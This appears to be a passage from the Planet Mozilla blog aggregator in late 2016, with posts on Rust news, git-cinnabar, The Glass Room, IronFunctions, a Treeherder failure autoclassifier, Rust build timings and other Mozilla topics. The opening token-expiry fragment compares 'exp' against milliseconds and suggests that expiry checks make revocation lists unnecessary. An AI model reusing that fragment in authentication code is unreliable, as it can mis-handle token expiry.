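    # base64url payloads may arrive without padding; add it back before decoding.
    padded = payload_b64 + '=' * (-len(payload_b64) % 4)
    payload = json.loads(base64.urlsafe_b64decode(padded.encode('ascii')))

    now_ms = int(time.time() * 1000)
    return payload['exp'] <= now_ms

An assertion, key, or certificate that fails this kind of check is simply rejected; no revocation list needs to be consulted.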

Planet Mozillaaccessibility tools for everyone

From The Man Who Is Transforming Microsoft:

[Satya Nadella] moves to another group of kids and then shifts his attention to a teenage student who is blind. The young woman has been working on building accessibility features using Cortana, Microsoft’s speech-activated digital assistant. She smiles and recites the menu options: “Hey Cortana. My essentials.” Despite his transatlantic jet lag Nadella is transfixed. “That’s awesome,” he says. “It’s fantastic to see you pushing the boundaries of what can be done.” He thanks her and turns toward the next group.

“I have a particular passion around accessibility, and this is something I spend quite a bit of cycles on,” Nadella tells me later. He has two daughters and a son; the son has special needs. “What she was showing me is essentially how she’s building out as a developer the tools that she can use in her everyday life to be productive. One thing is certain in life: All of us will need accessibility tools at some point.”

Planet MozillaHappy BMO Push Day!

the following changes have been pushed to bugzilla.mozilla.org:

  • [1264821] We want to replace the project kick-off form with a contract request form
  • [1310757] Update form: bugzilla.mozilla.org/form.CRM

discuss these changes on mozilla.tools.bmo.


Planet MozillaI’ve launched a Mozilla Donation Campaign for #CyberMonday craziness.

I have started a small campaign today and I am so happy to see it working – 138 engagements so far and a few donations. There is no way to see the donations, but I can see more “I have donated” tweets in the target languages.

Please retweet and take action :)

Update: Actually there is a way to check the effect of the campaign. I used a web tool to count the tweets that every user can tweet after the donation.

I can see the trend here:

The post I’ve launched a Mozilla Donation Campaign for #CyberMonday craziness. appeared first on Bogomil Shopov.

Planet MozillaThis Week in Rust 158

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

Other Weeklies from Rust Community

Crate of the Week

Since there were no nominations, this week has to go without a Crate of the Week. Sorry. Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available; visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

66 pull requests were merged in the last week. Not much, but there were a good number of awesome changes:

New Contributors

  • fkjogu
  • Paul Lietar
  • Sam Estep
  • Vickenty Fesunov

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now. This week's FCPs are:

New RFCs

No new RFCs were proposed this week.

Style RFCs

Style RFCs are part of the process for deciding on style guidelines for the Rust community and defaults for Rustfmt. The process is similar to the RFC process, but we try to reach rough consensus on issues (including a final comment period) before progressing to PRs. Just like the RFC process, all users are welcome to comment and submit RFCs. If you want to help decide what Rust code should look like, come get involved!

PRs:

Ready for PR:

Final comment period:

Other notable issues:

Upcoming Events

If you are running a Rust event please add it to the calendar to get it mentioned here. Email the Rust Community Team for access.

fn work(on: RustProject) -> Money

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

No quote was selected for QotW.

Submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and brson.

Planet MozillaAnnouncing git-cinnabar 0.4.0 release candidate

Git-cinnabar is a git remote helper to interact with Mercurial repositories. It allows you to clone, pull and push from/to Mercurial remote repositories, using git.

Get it on github.

These release notes are also available on the git-cinnabar wiki.

What’s new since 0.4.0b3?

  • Updated git to 2.10.2 for cinnabar-helper.
  • Added a new git cinnabar download command to download a helper on platforms where one is available.
  • Fixed some corner cases with pack windows in the helper. This prevented cloning mozilla-central with the helper.
  • Fixed bundle2 support that broke cloning from a mercurial 4.0 server in some cases.
  • Fixed some corner cases involving empty files. This prevented cloning Mozilla’s stylo incubator repository.
  • Fixed some correctness issues in file parenting when pushing changesets pulled from one mercurial repository to another.
  • Various improvements to the rules to build the helper.
  • Experimental (and slow) support for pushing merges, with caveats. See issue #20 for details about the current status.

And since I realize I didn’t announce beta 3:

What’s new since 0.4.0b2?

  • Properly handle bundle2 errors, preventing git from believing a push happened when it didn’t. (0.3.x is unaffected)

Planet MozillaThe Glass Room: Looking into Your Online Life

It’s that time of year! The excitement of Black Friday carries into today – CyberMonday – the juxtaposition of the analog age and the digital age. Both days are fueled by media and retailers alike and are about shopping. And both days are heavily reliant on the things that we want, that we need and what we think others want and need. And, all of it is powered by the data about us as consumers. So, today – the day of electronic shopping – is the perfect day to provoke some deep thinking on how our digital lives impact our privacy and online security. How do we do this?

One way is by launching “The Glass Room” – an art exhibition and educational space that teaches visitors about the relationship between technology, privacy and online security. The Glass Room will be open in downtown New York City for most of the holiday shopping season. Anyone can enter the “UnStore” for free to get a behind the scenes look at what happens to your privacy online. You’ll also get access to a crew of “InGeniouses” who can help you with online privacy and data tips and tricks. The Glass Room has 54 interactive works that show visitors the relationship between your personal data and the technology services and products you use.


This is no small task. Most of us don’t think about our online security and privacy every day. As with our personal health, it is important but presumed. Still, when we don’t take preventative care of ourselves, we are at greater risk of getting sick.

The same is true online. We are impacted by security and privacy issues every day without even realizing it. In the crush of our daily lives, few of us have the time to learn how to better protect ourselves and preserve our privacy online. We don’t always take enough time to get our checkups, eat healthily and stay active – but we would be healthier if we did. We are launching The Glass Room to allow you to think, enjoy and learn how to do a checkup of your online health.

We can buy just about anything we imagine on CyberMonday and have it immediately shipped to our door. We have to work a little harder to protect our priceless privacy and security online. As we collectively exercise our shopping muscles, I hope we can also think about the broader importance of our online behaviors to maintaining our online health.

If you are in New York City, please come down to The Glass Room and join the discussion. You can also check out all the projects, products and stories that The Glass Room will show you to look into your online life from different perspectives by visiting The Glass Room online.

 

Planet MozillaRustifying IronFunctions

As mentioned in my previous blog post there is new open-source, lambda compatible, on-premise, language agnostic, server-less compute service called IronFunctions.

While IronFunctions is written in Go, Rust is still a much-admired language, so it was decided to add support for it in the fn tool.

So now you can use the fn tool to create and publish functions written in Rust.

Using rust with functions

The easiest way to create an iron function in Rust is via cargo and fn.

Prerequisites

First create an empty rust project as follows:

$ cargo init --name func --bin

Make sure the project name is func and the type is bin. Now just edit your code; a good example is the following "Hello" program:

use std::io;  
use std::io::Read;

fn main() {  
    let mut buffer = String::new();
    let stdin = io::stdin();
    if stdin.lock().read_to_string(&mut buffer).is_ok() {
        println!("Hello {}", buffer.trim());
    }
}

You can find this example code in the repo.

Once done you can create an iron function.

Creating a function

$ fn init --runtime=rust <username>/<funcname>

In my case it’s fn init --runtime=rust seiflotfy/rustyfunc, which will create the func.yaml file required by functions.

Building the function

$ fn build

This will create a Docker image <username>/<funcname> (again, in my case seiflotfy/rustyfunc).

Testing

You can run this locally without pushing it to functions yet by running:

$ echo Jon Snow | fn run
Hello Jon Snow  

Publishing

In the directory of your rust code do the following:

$ fn publish -v -f -d ./

This will publish your code to your functions service.

Running it

Now to call it on the functions service:

$ echo Jon Snow | fn call seiflotfy rustyfunc 

which is the equivalent of:

$ curl -X POST -d 'Jon Snow' http://localhost:8080/r/seiflotfy/rustyfunc

Next

In the next post I will be writing a more computation-intensive Rust function to test/benchmark IronFunctions, so stay tuned :D

Planet MozillaTraining an autoclassifier

Here at Mozilla, we’ve accepted that a certain amount of intermittent failure in our automated testing of Firefox is to be expected. That is, for every push, a subset of the tests that we run will fail for reasons that have nothing to do with the quality (or lack thereof) of the push itself.

On the main integration branches that developers commit code to, we have dedicated staff and volunteers called sheriffs who attempt to distinguish these expected failures from intermittents through a manual classification process using Treeherder. On any given push, you can usually find some failed jobs that have stars beside them; this is the work of the sheriffs, indicating that a job’s failure is “nothing to worry about”:

This generally works pretty well, though unfortunately it doesn’t help developers who need to test their changes on Try, where pushes have the same sorts of failures but no sheriffs to watch them or interpret the results. For this reason (and a few others which I won’t go into detail on here), there’s been much interest in having Treeherder autoclassify known failures.

We have a partially implemented version that attempts to do this based on structured (failure line) information, but we’ve had some difficulty creating a reasonable user interface to train it. Sheriffs are used to being able to quickly tag many jobs with the same bug. Having to go through each job’s failure lines and manually annotate each of them is much more time consuming, at least with the approaches that have been tried so far.

It’s quite possible that this is a solvable problem, but I thought it might be an interesting exercise to see how far we could get training an autoclassifier with only the existing per-job classifications as training data. With some recent work I’ve done on refactoring Treeherder’s database, getting a complete set of per-job failure line information is only a small SQL query away:

select bjm.id, bjm.bug_id, tle.line from bug_job_map as bjm
  left join text_log_step as tls on tls.job_id = bjm.job_id
  left join text_log_error as tle on tle.step_id = tls.id
  where bjm.created > '2016-10-31' and bjm.created < '2016-11-24' and bjm.user_id is not NULL and bjm.bug_id is not NULL
  order by bjm.id, tle.step_id, tle.id;

Just to give some explanation of this query, the “bug_job_map” provides a list of bugs that have been applied to jobs. The “text_log_step” and “text_log_error” tables contain the actual errors that Treeherder has extracted from the textual logs (to explain the failure). From this raw list of mappings and errors, we can construct a data structure incorporating the job, the assigned bug and the textual errors inside it. For example:

{
"bug_number": 1202623,
"lines": [
  "browser_private_clicktoplay.js Test timed out -",
  "browser_private_clicktoplay.js Found a tab after previous test timed out: http:/<number><number>:<number>/browser/browser/base/content/test/plugins/plugin_test.html -",
  "browser_private_clicktoplay.js Found a browser window after previous test timed out -",
  "browser_private_clicktoplay.js A promise chain failed to handle a rejection:  - at chrome://mochikit/content/browser-test.js:<number> - TypeError: this.SimpleTest.isExpectingUncaughtException is not a function",
  "browser_privatebrowsing_newtab_from_popup.js Test timed out -",
  "browser_privatebrowsing_newtab_from_popup.js Found a browser window after previous test timed out -",
  "browser_privatebrowsing_newtab_from_popup.js Found a browser window after previous test timed out -",
  "browser_privatebrowsing_newtab_from_popup.js Found a browser window
  after previous test timed out -"
  ]
}
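
As a rough sketch of that grouping step (illustrative only, not the actual Treeherder code), assuming each row returned by the query above arrives as a (bug_job_map_id, bug_id, line) tuple:

from collections import defaultdict

def group_failure_lines(rows):
    """Group (bug_job_map_id, bug_id, line) rows into one document per
    classification, matching the structure shown above."""
    docs = defaultdict(lambda: {"bug_number": None, "lines": []})
    for bjm_id, bug_id, line in rows:
        doc = docs[bjm_id]
        doc["bug_number"] = bug_id
        if line:  # a classified job may have no extracted error lines
            doc["lines"].append(line)
    return list(docs.values())

# Example with two error lines belonging to the same classification:
rows = [
    (1, 1202623, "browser_private_clicktoplay.js Test timed out -"),
    (1, 1202623, "browser_privatebrowsing_newtab_from_popup.js Test timed out -"),
]
print(group_failure_lines(rows))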

Some quick google searching revealed that scikit-learn is a popular tool for experimenting with text classifications. They even had a tutorial on classifying newsgroup posts which seemed tantalizingly close to what we needed to do here. In that example, they wanted to predict which newsgroup a post belonged to based on its content. In our case, we want to predict which existing bug a job failure should belong to based on its error lines.

There are obviously some differences in our domain: test failures are much more regular and structured. There are lots of numbers in them which are mostly irrelevant to the classification (e.g. the “expected 12 pixels different, got 10!” type errors in reftests). Ordering of failures might matter. Still, some of the techniques used on corpora of normal text documents for training a classifier probably map nicely onto what we’re trying to do here: it seems plausible, for example, that weighting words which occur more frequently less strongly against ones that are less common would be helpful, and that’s one thing their default transformers do.
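
As a toy illustration of that weighting (the failure lines below are made up, not taken from the Treeherder data), a token that appears in most documents ends up with a lower inverse-document-frequency weight than a rarer, more distinctive one:

from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer

docs = [
    "test timed out waiting for window",
    "test timed out waiting for tab",
    "leaked two windows until shutdown",
]
vectorizer = CountVectorizer()
counts = vectorizer.fit_transform(docs)
tfidf = TfidfTransformer().fit(counts)

# idf_ is larger for tokens that occur in fewer documents, so the common
# token "test" contributes less to a classification than the rarer "leaked".
for token in ("test", "leaked"):
    print("%s %.3f" % (token, tfidf.idf_[vectorizer.vocabulary_[token]]))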

In any case, I built a small script to download a subset of the data (from November 1st to November 23rd), used it as training data for a classifier, then tested that against another subset of test failures between November 24th and 28th.

import os
from sklearn.datasets import load_files
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.linear_model import SGDClassifier


training_set = load_files('training')
count_vect = CountVectorizer()
X_train_counts = count_vect.fit_transform(training_set.data)
tfidf_transformer = TfidfTransformer()
X_train_tfidf = tfidf_transformer.fit_transform(X_train_counts)
clf = SGDClassifier(loss='hinge', penalty='l2',
                    alpha=1e-3, n_iter=5, random_state=42).fit(X_train_tfidf, training_set.target)

num_correct = 0
num_missed = 0

for (subdir, _, fnames) in os.walk('testing/'):
    if fnames:
        bugnum = os.path.basename(subdir)
        print bugnum, fnames
        for fname in fnames:
            doc = open(os.path.join(subdir, fname)).read()
            if not len(doc):
                print "--> (skipping, empty)"
                continue  # skip empty documents rather than classifying them
            X_new_counts = count_vect.transform([doc])
            X_new_tfidf = tfidf_transformer.transform(X_new_counts)
            predicted_bugnum = training_set.target_names[clf.predict(X_new_tfidf)[0]]
            if bugnum == predicted_bugnum:
                num_correct += 1
                print "--> correct"
            else:
                num_missed += 1
                print "--> missed (%s)" % predicted_bugnum
print "Correct: %s Missed: %s Ratio: %s" % (num_correct, num_missed, num_correct / float(num_correct + num_missed))

With absolutely no tweaking whatsoever, I got an accuracy rate of 75% on the test data. That is, the algorithm chose the correct classification given the failure text 1312 times out of 1959. Not bad for a first attempt!

After getting that working, I did some initial testing to see if I could get better results by reusing some of the error ETL summary code in Treeherder we use for bug suggestions, but the results were pretty much the same.

So what’s next? This seems like a wide open area to me, but some initial areas that seem worth exploring, if we wanted to take this idea further:

  1. Investigate cases where the autoclassification failed or had a near miss. Is there a pattern here? Is there something simple we could do, either by tweaking the input data or using a better vectorizer/tokenizer?
  2. Have a confidence threshold for using the autoclassifier’s data. It seems likely to me that many of the cases above where we got the wrong result were cases where the classifier itself wasn’t that confident in it (vs. others). We can either present that confidence in the user interface or avoid classifications for these cases altogether (and leave it up to a human being to make a decision on whether this is an intermittent). A rough sketch of this idea follows the list.
  3. Using the structured log data inside the database as input to a classifier. Structured log data here is much more regular and denser than the free text that we’re using. Even if it isn’t explicitly classified, we may well get better results by using it as our input data.
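
On the confidence-threshold idea in point 2, one cheap approximation (a sketch only, not something I have validated) is to look at the margin between the classifier’s top two decision_function scores and refuse to autoclassify when that margin is small. This reuses the clf, count_vect, tfidf_transformer and training_set objects from the script above, assumes more than two candidate bugs, and the threshold value is arbitrary:

import numpy as np

def classify_with_confidence(doc, threshold=1.0):
    """Return the predicted bug number, or None when the margin between the
    best and second-best classes is below `threshold`, leaving the decision
    to a human."""
    X = tfidf_transformer.transform(count_vect.transform([doc]))
    scores = clf.decision_function(X)[0]  # one score per candidate bug
    top_two = np.sort(scores)[-2:]        # [runner-up, best]
    if top_two[1] - top_two[0] < threshold:
        return None
    return training_set.target_names[int(np.argmax(scores))]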

If you’d like to experiment with the data and/or code, I’ve put it up on a github repository.

Planet MozillaPlanet: A Minor Administrative Note

I will very shortly be adding some boilerplate to the Planet homepage as well as the Planet.m.o entry on Wikimo, to the effect that:

All of this was true before, but we’re going to highlight it on the homepage and make it explicit in the wiki; we want Planet to stay what it is: open, participatory, an equal and accessible platform for everyone involved. But we also don’t want Planet to become an attack surface against Mozilla or anyone else, and we won’t allow that to happen out of willful blindness or neglect.

If you’ve got any questions or concerns about this, feel free to leave a comment or email me.

Planet MozillaHow fast can I build Rust?

I've been collecting some data on the fastest way to build the Rust compiler. This is primarily for Rust developers to optimise their workflow, but it might also be of general interest.

TL;DR: the fastest way to build Rust (on a computer with lots of cores) is with -j6, RUSTFLAGS=-Ccodegen-units=10.

I tested using a commit from 24 November 2016. I was using the make build system (though I would expect the same results using Rustbuild). The test machine is a dedicated build machine - it has 12 physical cores, lots of RAM, and an SSD. It wasn't used for anything else during the benchmarking, and doesn't run a windowing system. It was running Ubuntu 16.10 (Linux). I only did one run per set of variables. That is not ideal, but where I repeated runs, they were fairly consistent - usually within a second or two and never more than 10 seconds. I've rounded all results to the nearest 10 seconds, and I believe that level of precision is about right for the experiment.

I varied the number of jobs (-jn) and the number of codegen units (RUSTFLAGS=-Ccodegen-units=n). The command line looked something like RUSTFLAGS=-Ccodegen-units=10 make -j6. I measured the time to do a normal build of the whole compiler and libraries (make), to build the stage1 compiler (make rustc-stage1, the minimal amount of work required to get a compiler for testing), and to build and bootstrap the compiler and run all tests (make && make check; I didn't run a simple make check because adding -jn to that causes many tests to be skipped, and setting codegen-units > 1 causes some tests to fail).

The jobs number is the number of tasks make can run in parallel. These runs are self-contained instances of the compiler, i.e., this is parallelism outside the compiler. The amount of parallelism is limited by dependencies between crates in the compiler. Since the crates in the compiler are rather large and there are a lot of dependencies, the benefits of using a large number of jobs are much weaker than in a typical C or C++ program (e.g., LLVM). Note, however, that there is no real drawback to using a larger number of jobs; there just won't be any benefit.

Codegen units introduce parallelism within the compiler. First, some background. Compilation can be roughly split into two: first, code is analysed (parsing, type checking, etc.), then object code is generated from the products of analysis. The Rust compiler uses LLVM for the code generation part. Roughly half the time running an optimised build is spent in each of analysis and code generation. Nearly all optimisation is performed in the code generation part.

The compilation unit in Rust is a crate; that is, the Rust compiler analyses and compiles a single crate at a time. By default, code generation also works at the same level of granularity. However, by specifying the number of codegen units, we tell the compiler that once analysis is complete, it should break the crate into smaller units and run LLVM code generation on each unit in parallel. That means we get parallelism inside the compiler, albeit only for about half of the work. There is a disadvantage, however: using multiple codegen units means the program will not be optimised as well as if a single unit were used. This is analogous to turning off LTO in a C program. For this reason, you should not use multiple codegen units when building production software.
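
As a back-of-the-envelope model (my own simplification, not a measurement: it assumes the analysis/codegen split is exactly half and that codegen parallelises perfectly across units), Amdahl's law caps the speed-up from n codegen units at 1 / (0.5 + 0.5/n), i.e. never better than 2x:

# speedup(n) = 1 / (0.5 + 0.5 / n): 1.00x, 1.33x, 1.60x, 1.82x for 1, 2, 4, 10 units
for n in (1, 2, 4, 10):
    print("%d units: %.2fx" % (n, 1 / (0.5 + 0.5 / n)))

That shape matches the diminishing returns visible in the tables below.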

So when building the compiler, if we use many codegen units we might expect the compilation to go faster, but when we run the new compiler, it will be slower. Since we use the new compiler to build at least the libraries and sometimes another compiler, this could be an important factor in the total time.

If you're interested in this kind of thing, we keep track of compiler performance at perf.r-l.o (although only single-threaded builds). Nicholas Nethercote has recently written a couple of blog posts on running and optimising the compiler.

make

This experiment ran a simple make build. It builds two versions of the compiler - one using the last beta, and the second using the first.

        cg1     cg2     cg4     cg6     cg8     cg10    cg12
-j1     48m50s  39m40s  31m30s  29m50s  29m20s
-j2     34m10s  27m40s  21m40s  20m30s  20m10s  19m30s  19m20s
-j4     28m10s  23m00s  17m50s  16m50s  16m40s  16m00s  16m00s
-j6     27m40s  22m40s  17m20s  16m20s  16m10s  15m40s  15m50s
-j8     27m40s  22m30s  17m20s  16m30s  16m30s  15m40s  15m40s
-j10    27m40s
-j12    27m40s
-j14    27m50s
-j16    27m50s

In general, we get better results using more jobs and more codegen units. Looking at the number of jobs, there is no improvement after 6. For codegen units, the improvements quickly diminish, but there is some improvement right up to using 10 (for all jobs > 2, 12 codegen units gave the same result as 10). It is possible that 9 or 11 codegen units may be more optimal (I only tested even numbers), but probably not by enough to be significant, given the precision of the experiment.

make rustc-stage1

This experiment ran make rustc-stage1. That builds a single compiler and the libraries necessary to use that compiler. It is the minimal amount of work necessary to test modifications to the compiler. It is significantly quicker than make.

        cg1     cg2     cg4     cg6     cg8     cg10    cg12
-j1     15m10s  12m10s  9m40s   9m10s   9m10s   8m50s   8m50s
-j2     11m00s  8m50s   6m50s   6m20s   6m20s   6m00s   6m00s
-j4     9m00s   7m30s   5m40s   5m20s   5m20s   5m10s   5m00s
-j6     9m00s   7m10s   5m30s   5m10s   5m00s   5m00s   5m00s

I only tested jobs up to 6, since there seems to be no way for more jobs to be profitable here if they were not in the previous experiment. It turned out that 6 jobs was only marginally better than 4 in this case, I assume because of more dependency bottlenecks relative to a full make.

I would expect more codegen units to be more effective here (since we're using the resulting compiler for less), but I was wrong. This may just be due to the precision of the test (and the relatively shorter total time), but for all numbers of jobs, 6 codegen units were as good as more. So, for this kind of build, six jobs and six codegen units is optimal; however, using ten codegen units (as for make) is not harmful.

make -jn && make check

This experiment is the way to build all the compilers and libraries and run all tests. I measured the two parts separately. As you might expect, the first part corresponded exactly with the results of the make experiment. The second part (make check) took a fairly consistent amount of time - it is independent of the number of jobs since the test infrastructure does its own parallelisation. I would expect compilation of tests to be slower with a compiler compiled with a larger number of codegen units. For one or two codegen units, make check took 12m40s; for four to ten, it took 12m50s, a marginal difference. That means that the optimal build used six jobs and ten codegen units (as for make), giving a total time of 28m30s (c.f., 61m40s for one job and one codegen unit).

Planet MozillaAnnouncing Panel of Judges for Mozilla’s Equal Rating Innovation Challenge

Mozilla is delighted to announce the esteemed judges for the Equal Rating Innovation Challenge

  • Rocio Fonseca (Chile), Executive Director of Start-Up Chile
  • Omobola Johnson (Nigeria), Honorary Chair of the Alliance for Affordable Internet and Partner of TLcom Capital LLP
  • Nikhil Pahwa (India), Founder at MediaNama and Co-founder of savetheinternet.in
  • Marlon Parker (South Africa), Founder of Reconstructed Living Labs

These four leaders will join Mitchell Baker (USA), Executive Chairwoman of Mozilla, on the judging panel for the Equal Rating Innovation Challenge. The judges will be bringing their wealth of industry experience and long-standing expertise from various positions in policy, entrepreneurship, and consulting in the private and public sector to assess the challenge submissions.


Mozilla seeks to find novel solutions to connect all people to the open Internet so they can realize the full potential of this globally shared resource. We’re both thrilled and proud to have gathered such a great roster of judges for the Innovation Challenge — it’s a testament to the global scope of the initiative. Each one of these leaders has already contributed in many ways to tackle the broader challenge of connecting the unconnected and it is an honour to have these global heavyweights in our panel.

The Equal Rating Innovation Challenge will support promising solutions through expert mentorship and funding of US$250,000 in prize monies split into three categories: Best Overall (with a key focus on scalability), Best Overall Runner-up, and Most Novel Solution (based on experimentation with a potential high reward).

The judges will score submissions according to the degree by which they meet the following attributes:

  • 25pts: Scalability
  • 20pts: Focus on user experience
  • 15pts: Differentiation
  • 10pts: Ability to be quickly deployed into the market (within 9–12 months)
  • 10pts: Potential of the team
  • 10pts: Community voting results

The deadline for submission is 6 January 2017. On 17 January, the judges will announce five semifinalists. Those semifinalists will be provided advice and mentorship from Mozilla experts in topics such as policy, business, engineering, and design to hone their solution. The semifinalists will take part in a Demo Day on 9 March 2017 in New York City to pitch their solutions to the judges. The public will then be invited to vote for their favorite solution online during a community voting period from 10–16 March, and the challenge winners will be announced on 29 March 2017.


Announcing Panel of Judges for Mozilla’s Equal Rating Innovation Challenge was originally published in Mozilla Open Innovation on Medium, where people are continuing the conversation by highlighting and responding to this story.

Planet MozillaFirefox 51 Beta 3 Testday Results

Hi everyone!

Last Friday, November 25th, we held Firefox 51 Beta 3 Testday.  It was a successful event (please see the results section below) so a big Thank You goes to everyone involved.

First of all, many thanks to our active contributors: Krithika MAP, Moin Shaikh, M A Prasanna, Steven Le Flohic, P Avinash Sharma, Iryna Thompson.

Bangladesh team: Nazir Ahmed Sabbir, Sajedul Islam, Maruf Rahman, Majedul islam Rifat, Ahmed Safa,  Md Rakibul Islam, M. Almas Hossain, Foysal Ahmed, Nadim Mahmud, Amir Hossain Rhidoy, Mohammad Abidur Rahman Chowdhury, Mahfujur Rahman Mehedi, Md Omar Faruk sobuj, Sajal Ahmed, Rezwana Islam Ria, Talha Zubaer, maruf hasan, Farhadur Raja Fahim, Saima sharleen, Azmina AKterPapeya, Syed Nayeem Roman.

India team:  Vibhanshu Chaudhary, Surentharan.R.A, Subhrajyoti Sen, Govindarajan Sivaraj, Kavya Kumaravel, Bhuvana Meenakshi.K, Paarttipaabhalaji, P Avinash Sharma, Nagaraj V, Pavithra R, Roshan Dawande, Baranitharan, SriSailesh, Kesavan S, Rajesh. D, Sankararaman, Dinesh Kumar M, Krithikasowbarnika.

Secondly, a big thank you to all our active moderators.

Results:

We hope to see you all in our next events, all the details will be posted on QMO!

Planet MozillaMeasuring tab and window usage in Firefox

With Mozilla’s Telemetry system, we have a powerful way to collect measurements in the clients while still complying to our rules of lean data collection and anonymization. Most of the measurements are collected in form of histograms that are created on the client side and submitted to our Telemetry pipeline. However, recent needs for better … 

Planet MozillaEmbedding Use Cases

A couple weeks ago, I blogged about Why Embedding Matters. A rendering engine can be put to a wide variety of uses. Here are a few of them. Which would you prioritize?

Headless Browser

A headless browser is an app that renders a web page (and executes its script) without displaying the page to a user. Headless browsers themselves have multiple uses, including automated testing of websites, web crawling/scraping, and rendering engine comparisons.

Longstanding Mozilla bug 446591 tracks the implementation of headless rendering in Gecko, and SlimerJS is a prime example of a headless browser that would benefit from it. It’s a “scriptable browser for Web developers” that integrates with CasperJS and is compatible with the WebKit-based PhantomJS headless browser. It currently uses Firefox to “embed” Gecko, which means it doesn’t run headlessly (SlimerJS issue #80 requests embedding Gecko as a headless browser).

Hybrid Desktop App

A Hybrid Desktop App is a desktop app that is implemented primarily with web technologies but packaged, distributed, and installed as a native app. It enables developers to leverage web development skills to write an app that runs on multiple desktop platforms (typically Windows, Mac, Linux) with minimal platform-specific development.

Generally, such apps are implemented using an application framework, and Electron is the one with momentum and mindshare; but there are others available. While frameworks can support deep integration with the native platform, the apps themselves are often shallower, limiting themselves to a small subset of platform APIs (window management, menus, etc.). Some are little more than a local web app loaded in a native window.

Hybrid Desktop Web Browser

A specialization of the Hybrid Desktop App, the Hybrid Desktop Web Browser is notable not only because Mozilla’s core product offering is a web browser but also because the category is seeing a wave of innovation, both within and outside of Mozilla.

Besides Mozilla’s Tofino and Browser.html projects, there are open source startups like Brave; open-source hobbyist projects like Min, Alloy, electron-browser, miserve, and elector; and proprietary browsers like Blisk and Vivaldi. Those products aren’t all Hybrid Apps, but many of them are (and they all need to embed a rendering engine, one way or another).

Hybrid Mobile App

A Hybrid Mobile App is like a Hybrid Desktop App, but for mobile platforms (primarily iOS and Android). As with their desktop counterparts, they’re usually implemented using an application framework (like Cordova). And some use the system’s web rendering component (WebView), while others ship their own via frameworks (like Crosswalk).

Basecamp notably implemented a hybrid mobile app, which they described in Hybrid sweet spot: Native navigation, web content.

(There’s also a category of apps that are implemented with some web technologies but “compile to native,” such that they render their interface using native components rather than a WebView. React Native is the most notable such framework, and James Long has some observations about it in Radical Statements about the Mobile Web and First Impressions using React Native.)

Mobile App With WebView

A Mobile App With WebView is a native app that incorporates web content using a WebView. In some cases, a significant portion of the app’s interface displays web content. But these apps are distinct from Hybrid Mobile Apps not only in degree but in kind, as the choice to develop a native app with web content (as opposed to packaging a web app in a native format using a hybrid app framework) entrains different skillsets and toolchains.

Facebook (which famously abandoned hybrid app development in 2012) is an example of such an app.

Site-Specific Browser (SSB)

A Site-Specific Browser (SSB) is a native desktop app (or simulation thereof) that loads a single web app in a discrete native window. SSBs typically install launcher icons in OS app launchers, remove or minimize browser chrome in app windows, and may include native menus and other features typical of desktop apps.

Chrome’s --app mode allows it to simulate an SSB, and recent Mozilla bug 1283670 requests a similar feature for Firefox.

SSBs differ from hybrid desktop apps because they wrap regular web apps (i.e. apps that are hosted on a web server and also available via a standard web browser). They’re also typically created by users using utilities, browser features, or browser extensions rather than by developers. Examples of such tools include Prism, Standalone, and Fluid. However, hybrid app frameworks like Electron can also be used (by both users and developers) to create SSBs.

Linux Embedded Device

A variety of embedded devices include a graphical user interface (GUI), including human-machine interface (HMI) devices and Point of Interest (POI) kiosks. Embedded devices with such interfaces often implement them using web technologies, for which they need to integrate a rendering engine.

The embedded device space is complex, with multiple solutions at every layer of the technology stack, from hardware chipset through OS (and OS distribution) to application framework. But Linux is a popular choice at the operating system layer, and projects like OpenEmbedded/Yocto Project and Buildroot specialize in embedded Linux distributions.

Embedded devices with GUIs also come in all shapes and sizes. However, it’s possible to identify a few broad categories. The ones for which an embedded rendering engine seems most useful include industrial and home automation (which use HMI screens to control machines), POI/POS kiosks, and smart TVs. There may also be some IoT devices with GUIs.

Planet Mozillalibopenraw 0.1.0

I just released libopenraw 0.1.0. It is to be treated as a snapshot as it hasn't reached the level of functionality I was hoping for, and it has been 5 years since the last release.

Head on to the download page to get a tarball.

There are several new APIs and some API and ABI breakage. The .pc files are now parallel-installable.

Planet MozillaHeading into the home stretch

Over the past few weeks, we’ve been exploring different iterations of our brand identity system. We know we need a solution that represents both who Mozilla is today and where we’re going in the future, and appeals both to people who know Mozilla well and new audiences who may not know or understand Mozilla yet. If you’re new to this project, you can read all about our journey on our blog, and the most recent post about the two different design directions that are informing this current round of work.

[TL;DR: Our “Protocol” design direction delivers well on our mission, legacy and vision to build an Internet as a global public resource that is healthy, open and accessible to all. Based on quantitative surveys, Mozillians and developers believe this direction does the best job supporting an experience that’s innovative, opinionated and inclusive, the attributes we want to be known for.  In similar surveys, our target consumers evaluated our “Burst” design direction as the better option in terms of delivering on those attributes, and we also received feedback that this direction did a good job communicating interconnectedness and liveliness. Based on all of this feedback, our decision was to lead with the “Protocol” design direction, and explore ways to infuse it with some of the strengths of the “Burst” direction.]

Here’s an update on what we’ve been up to:

Getting to the heart of the matter

Earlier in our open design project, we conducted quantitative research to get statistically significant insights from our different key audiences (Mozillians, developers, consumers), and used these data points to inform our strategic decision about which design directions to continue to refine.

At this point of our open design project, we used qualitative research to understand better what parts of the refined identity system were doing a good job creating that overall experience, and what was either confusing or contradictory. We want Mozilla to be known and experienced as a non-profit organization that is innovative, opinionated and inclusive, and our logo and other elements in our brand identity system – like color, language and imagery – need to reinforce those attributes.

